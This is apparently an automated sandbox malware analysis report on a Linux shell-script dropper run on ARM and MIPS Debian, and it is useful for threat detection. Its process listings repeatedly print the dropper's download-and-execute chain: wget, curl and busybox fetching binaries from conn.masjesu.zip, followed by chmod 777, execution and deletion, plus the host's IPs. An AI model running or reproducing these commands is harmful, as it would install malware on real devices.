Malware Analysis Report

2025-04-03 18:52

Sample ID 241120-dx72lsvkan
Target cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
SHA256 cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca
Tags
antivm discovery defense_evasion
score
7/10

Analysis Overview

score
7/10

SHA256

cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca

Threat Level: Shows suspicious behavior

The file cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm discovery defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 03:24

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 03:24

Reported

2024-11-20 03:26

Platform

debian9-armhf-20240729-en

Max time kernel

148s

Max time network

3s

Command Line

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 03:24

Reported

2024-11-20 03:27

Platform

debian9-mipsbe-20240418-en

Max time kernel

97s

Max time network

99s

Command Line

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG N/A
N/A /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx N/A
N/A /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx N/A
N/A /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa N/A
N/A /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN N/A
N/A /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 N/A
N/A /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 N/A
N/A /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 N/A
N/A /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT N/A
N/A /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz N/A
N/A /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx N/A
N/A /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m N/A
N/A /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS N/A
N/A /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /usr/bin/curl N/A
File opened for modification /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /usr/bin/curl N/A
File opened for modification /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /usr/bin/curl N/A
File opened for modification /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /usr/bin/curl N/A
File opened for modification /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /usr/bin/curl N/A
File opened for modification /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /usr/bin/curl N/A
File opened for modification /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /usr/bin/curl N/A
File opened for modification /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /usr/bin/curl N/A
File opened for modification /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /usr/bin/curl N/A
File opened for modification /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /usr/bin/curl N/A
File opened for modification /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /usr/bin/curl N/A
File opened for modification /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /usr/bin/curl N/A
File opened for modification /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /usr/bin/curl N/A
File opened for modification /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /usr/bin/curl N/A

Processes

/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/chmod

[chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

[./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/rm

[rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/chmod

[chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx

[./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/rm

[rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/chmod

[chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx

[./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/rm

[rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/chmod

[chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa

[./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/rm

[rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/chmod

[chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN

[./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/rm

[rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/chmod

[chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4

[./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/rm

[rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/chmod

[chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1

[./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/rm

[rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/chmod

[chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8

[./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/rm

[rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/chmod

[chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT

[./DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/rm

[rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/chmod

[chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz

[./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/rm

[rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/chmod

[chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx

[./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/rm

[rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/chmod

[chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m

[./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/rm

[rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/chmod

[chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS

[./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/rm

[rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/chmod

[chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh

[./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/rm

[rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp

Files

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 03:24

Reported

2024-11-20 03:27

Platform

debian9-mipsel-20240611-en

Max time kernel

102s

Max time network

105s

Command Line

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG N/A
N/A /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx N/A
N/A /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx N/A
N/A /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa N/A
N/A /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN N/A
N/A /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 N/A
N/A /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 N/A
N/A /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 N/A
N/A /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT N/A
N/A /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz N/A
N/A /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx N/A
N/A /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m N/A
N/A /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS N/A
N/A /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /usr/bin/curl N/A
File opened for modification /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /usr/bin/curl N/A
File opened for modification /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /usr/bin/curl N/A
File opened for modification /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /usr/bin/curl N/A
File opened for modification /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /usr/bin/curl N/A
File opened for modification /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /usr/bin/curl N/A
File opened for modification /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /usr/bin/curl N/A
File opened for modification /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /usr/bin/curl N/A
File opened for modification /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /usr/bin/curl N/A
File opened for modification /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /usr/bin/curl N/A
File opened for modification /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /usr/bin/curl N/A
File opened for modification /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /usr/bin/curl N/A
File opened for modification /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /usr/bin/curl N/A
File opened for modification /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /usr/bin/curl N/A

Processes

/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/chmod

[chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

[./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/rm

[rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/chmod

[chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx

[./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/rm

[rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/chmod

[chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx

[./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/rm

[rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/chmod

[chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa

[./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/rm

[rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/chmod

[chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN

[./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/rm

[rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/chmod

[chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4

[./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/rm

[rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/chmod

[chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1

[./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/rm

[rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/chmod

[chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8

[./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/rm

[rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/chmod

[chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT

[./DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/rm

[rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/chmod

[chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

